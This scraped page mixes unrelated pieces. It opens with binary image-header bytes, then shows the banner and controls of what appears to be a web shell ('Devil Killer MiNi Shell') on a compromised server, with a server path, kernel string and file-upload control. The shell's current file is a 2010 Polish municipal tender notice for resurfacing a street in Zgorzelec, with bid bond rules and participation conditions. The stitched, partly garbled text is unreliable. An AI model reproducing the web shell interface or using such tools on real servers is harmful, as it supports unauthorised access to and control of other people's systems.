JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100707/179147-N-2010.html

<p class="kh_header"><b>Zgorzelec: Modernizacja nawierzchni ul. Karłowicza</b><br>
<b>Numer ogłoszenia: 179147 - 2010; data zamieszczenia: 07.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja nawierzchni ul. Karłowicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest modernizacja nawierzchni przy ul. 
   Karłowicza w Zgorzelcu.

2.Zakres przedmiotu zamówienia obejmuje przebudowę nawierzchni chodnika oraz 
   budowę parkingu, przy ul. Karłowicza.

3.	Zakres przedmiotu zamówienia obejmuje:

1)	Roboty ziemne - korytowanie pod konstrukcję nawierzchni miejsc 
        postojowych i drogi manewrowej oraz ławy betonowe krawężników z wywozem 
        gruntu na wysypisko wg wyboru Wykonawcy z kosztami składowania, w tym 
        wywóz humusu na odległość do 4km składowany na hałdzie do ponownego 
        wbudowania. Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne 
        miejsc postojowych i drogi manewrowej.
2)	Przebudowa kabla eANN wraz z zabezpieczeniem rurą osłonową - kopanie 
        rowów dla kabli w sposób ręczny w gruncie kat. IV. Odkopanie istniejącego 
        kabla eANN, wykop liniowy w nowej trasie kabla celem przełożenia. Ułożenie 
        rury osłonowej DVK 110mm AROT, układanie kabla eANN w rurze osłonowej, 
        zasypanie z zagęszczeniem rowu rury osłonowej AROT.
3)	Wykonanie nawierzchni z kostki betonowej brukowej gr. 8cm na podsypce 
        piaskowej z wypełnieniem spoin piaskiem  - droga manewrowa.
4)	Wykonanie nawierzchni z płyty betonowej ażurowej (tzw. zielona) na podsypce 
        piaskowej - miejsca postojowe z podziałem stanowisk rzędem kostki betonowej 
        brukowej, zasypanie humusem o obsianie trawą.
5)	Rozbiórkę krawężników betonowych, płyt betonowych chodników, 
        ogrodzeń  z rur i kształtowników stalowych (niskich) terenów zielonych, 
        nawierzchni betonowej, w tym terenowe schody blokowe betonowe, płyt 
        etonowych typu trylinki.
6)	Wywóz gruzu betonowego z rozbiórki na wysypisko wg wyboru 
        Wykonawcy z kosztami składowania.
7)	Korytowanie pod konstrukcje nawierzchni chodników, dojazdu, ław 
        betonowych, krawężników i obrzeży.
8)	Podbudowa chodników z kruszywa łamanego, stabilizowana mechanicznie.
9)	Podbudowa dojazdu placu manewrowo- postojowego z kruszywa łamanego, 
        stabilizowana mechanicznie.
10)	Krawężniki betonowe wystające z wykonaniem ław betonowych z betonu.
11)	Obrzeża betonowe na ławie betonowej z betonu
12)	Chodniki z kostki betonowej brukowej szarej na podsypce piaskowej z 
        wypełnieniem spoin piaskiem.
13)	Place manewrowo - postojowe z kostki betonowej brukowej szarej na 
        podsypce z wypełnieniem spoin piaskiem.
14)	Dojazdy z kostki betonowej brukowej kolorowej na podsypce 
        pisakowej z wypełnieniem spoin piaskiem.
15)	Schody terenowe z obrzeży betonowych na ławie betonowej i podłożu z 
        betonu z wypełnieniem kostką betonową brukową na podsypce cementowo-
        wapiennej.
16)	Ściek z kostki kamiennej.
17)	Odtworzenie trawników poprzez zakładanie nowych 
        trawników z przygotowaniem podłoża z ziemi urodzajnej.
18)	Wykonanie trawników dywanowych siewem w gruncie kat. III bez nawożenia.
19)	Wycinka drzew z mechanicznym karczowaniem pni, usunięciem, oczyszczenie 
        terenu z pozostałości po ścięciu i wykarczowaniu.
20)	Sadzenie drzew - klon kulisty - form naturalnych na terenie płaskim w gruncie 
        kat. I-II z zaprawą do połowy głębokości dołów.
21)	Sadzenie krzewów żywopłotowych  - ligustr pospolity, w rowach w gruncie kat. 
        III z zaprawą rowów do połowy głębokości.
22)	Remont cząstkowy nawierzchni bitumicznej wzdłuż przebudowywanego 
        krawężnika kamiennego.
23)	Regulacja pionowa włazów kanałowych, skrzynek zaworowych, wpustów 
        ulicznych oraz nakryw studni telekomunikacyjnych.
4.	Wykonawca, jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt. 22 
        ustawy o odpadach ma obowiązek zagospodarowania odpadów powstałych 
        podczas realizacji zamówienia zgodnie z Ustawą o odpadach z dnia 21.04 2001 
        r. (t.j. z 2007 r. Dz. U. Nr 39, poz. 251 ze zm.) oraz ustawą Prawo Ochrony 
        Środowiska z dnia 27.04.2001 r. (t.j. z 2008 r. Dz. U. Nr 25, poz. 150). 
        Wykonawca w terminie wskazanym w umowie przedstawi Zamawiającemu 
         potwierdzenie zagospodarowania odpadów zgodnie z powszechnie 
         obowiązującymi przepisami i złożonym kosztorysem.
5.	Szczegółowy opis przedmiotu zamówienia określają: dokumentacja projektowa, 
        przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót 
        budowlanych stanowiące Załącznik Nr 1 do SIWZ.

6.	Wymagany okres gwarancji:
Zamawiający na wykonany przedmiot zamówienia wymaga minimum 36 miesięcznego okresu gwarancji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego, 
o którym mowa w art. 67 ust. 1 pkt 6 ustawy PZP, stanowiącego  nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 79.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca wniesie wadium w wysokości 6.718,00 zł przed upływem terminu  
        składania ofert, który został określony w pkt. 16.1 SIWZ.

2.	W zależności od woli Wykonawcy wadium może być wnoszone w formach:

1.	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
        kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3.	gwarancjach bankowych,
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach udzielanych przez podmioty, o których mowa w art.. 6b ust. 5 
        pkt 2 ustawy z dnia 9 listopada 2000 r.  o utworzeniu Polskiej Agencji Rozwoju 
        Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy 
        Zamawiającego Nr 35124012971111000025654013 w banku PeKaO S.A. I 
        O/Zgorzelec.
        Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu (wpłaty)  
        załączona do oferty z dopiskiem Wadium do postępowania nr WZP.341-19/10.
		
4.	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą 
        wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego 
        oferta zostanie odrzucona zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo 
        zamówień publicznych.

5.	Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze 
       oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem 
       wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z 
       zastrzeżeniem pkt. 6 .

6.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w 
        odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył 
        dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub 
        pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po 
        jego stronie.

7.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami 
        wynikającymi z umowy rachunku bankowego, na którym było ono 
        przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego 
        oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
        przez Wykonawcę.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego 
        oferta została wybrana:
1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
        określonych w ofercie,
2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3.	zawarcie umowy w sprawie zamówienia publicznego stało się 
        niemożliwe z przyczyn leżących po stronie wykonawcy,
4.	w przypadku określonym w pkt. 6 .

9.	W przypadku wniesienia wadium w formach  wymienionych w pkt. 2 ppkt od 2 
        do 5 z treści dokumentu musi jednoznacznie wynikać, iż wypłata 
        Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym w 
        pkt. 6 . 

10.	Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za   
        wniesione prawidłowo.

11.	Zamawiający wymaga, aby niepieniężne formy zapłaty wadium miały charakter 
        nieodwołalny i bezwarunkowy - równoważny pieniądzu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty  oświadczenia, o którym mowa w pkt. 10 A SIWZ metodą spełnia/ nie spełnia. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy -  w tym okresie, wykonał dwie roboty budowlane  polegające na budowie lub przebudowie dróg z kostki brukowej z podaniem ich łącznej wartości brutto nie mniejszej niż 410.000 zł, oraz daty i miejsca wykonania z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (formularz Nr  3 do SIWZ).
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt. 10 SIWZ metoda spełnia/ nie spełnia.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału  
 w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty  oświadczenia, o którym mowa w pkt. 10 A SIWZ metodą spełnia/ nie spełnia. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca:
a)	 wykaże się  dysponowaniem min. jedną osobą posiadającą uprawnienia budowlane w specjalności drogowej wraz z informacją o podstawie dysponowania tą osobą - Wykonawca złoży oświadczenie o dysponowaniu bądź poleganiu na zasobach innych podmiotów w tym zakresie - formularz Nr 4 do SIWZ.

b)	złoży oświadczenie, że osoby, o których mowa w pkt. a), które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.
Ocena spełnienia powyższych warunków nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych  w pkt. 10 SIWZ metodą spełnia/ nie spełnia.
  Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tych  
  warunków spowoduje wykluczenie Wykonawcy z postępowania po 
  wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału 
w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty  oświadczenia, o którym mowa w pkt. 10 A SIWZ metodą spełnia/ nie spełnia. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia  oferty zgodnie z art. 89 ust. 1 pkt. 2 , z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy PZP oraz art. 26 ust. 3 w zakresie dokumentu wskazanego w pkt. 2:

1)	wypełniony  formularz ofertowy - formularz Nr 1,

2)	oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1       (formularz Nr  2 do SIWZ),

3)	kosztorys ofertowy sporządzony metodą uproszczoną, wraz z zestawieniami (tabelami), opisami robót budowlanych zgodnie z załączonym do SIWZ przedmiarem robót. W kosztorysie ofertowym należy podać wartości składników cenotwórczych. Kosztorys ofertowy należy sporządzić zgodnie z zapisami pkt. 14 SIWZ.

4)	wypełniony formularz oświadczenia wskazującego część zamówienia, której wykonawca powierzy podwykonawcom, z uwzględnieniem zapisu pkt. 9.2 SIWZ - formularz nr  5  do SIWZ,
W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie własnymi siłami. W przypadku kiedy Wykonawca będzie korzystał z wiedzy                                  i doświadczenia innych podmiotów, a nie załączy przedmiotowego formularza do oferty, Zamawiający nie będzie mógł uznać spełnienia warunku określonego w pkt. 9.1 ppkt. 2 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość  dokonania  zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy. Zakres przewidzianych  zmian obejmuje:

1.	Zmianę kierownika budowy lub kierownika robót - Wykonawca może dokonywać zmiany kierownika budowy lub kierownika robót przedstawionych w ofercie jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kierownika budowy lub robót na następujących warunkach:

a)	Wykonawca proponuje zmianę kierownika budowy lub robót 
        w szczególności w razie: śmierci, choroby lub zdarzeń losowych, 
        niewywiązywania się z obowiązków wynikających  z umowy, rezygnacji tej 
        osoby, itp.
b)	Zamawiający może żądać od Wykonawcy zmiany kierownika budowy lub robót, 
        jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających  z umowy.
        Wykonawca obowiązany jest zmienić kierownika budowy lub robót zgodnie
        z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego.
c)	W przypadku zmiany kierownika budowy lub robót, nowa osoba powołana do 
        pełnienia ww. obowiązków musi spełniać wymagania określone w specyfikacji 
        istotnych warunków zamówienia dla pełnienia danej funkcji.

2.	Przesunięcie terminu wykonania robót w przypadku wystąpienia opóźnień wynikających z:

a.	 Wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających 
          wykonanie przedmiotowego zamówienia zgodnie  z procesem technologicznym 
          - fakt ten musi mieć odzwierciedlenie w dzienniku robót i musi być 
          potwierdzony przez Zamawiającego, przy czym powyższy fakt musi być 
         zgłoszony w formie pisemnej  Zamawiającemu  w terminie 5 dni roboczych od 
          dnia wystąpienia powyższych okoliczności. 
b.	Wystąpienia robót, o których mowa w art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych. Nowy termin zostanie ustalony w protokole konieczności i wprowadzony aneksem do umowy.

c.	Przestojów i opóźnień zawinionych przez Zamawiającego, tzn. jeżeli takie opóźnienie jest lub będzie miało wpływ na termin realizacji  przedmiotu umowy w szczególności dotyczących następujących przypadkach:

1.	przekazania terenu budowy,
2.	jakiekolwiek opóźnienia, utrudnienia, za które wykonawca nie ponosi odpowiedzialności.

c)	Pozostałe zmiany:

1.	Przekroczenie  zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp. Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu dokumentów potwierdzających powyższą okoliczność.


2.	Odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej. Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu dokumentów potwierdzających powyższą okoliczność.

3.	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin realizacji przedmiotu zamówienia.           

4.	Działania siły wyższej, tj. zdarzenie nadzwyczajne, zewnętrzne, niemożliwe do przewidzenia i przeciwdziałania, uniemożliwiające wykonanie zobowiązań wynikających  z umowy. 

3.	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą ze stron umowy
4.	W przypadkach, o których mowa w pkt. 2 wystąpienia opóźnień, strony ustalają nowe terminy realizacji, z tym że okres przesunięcia terminu zakończenia równy będzie co najmniej okresowi przerwy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 6, pokój nr 6.</p>
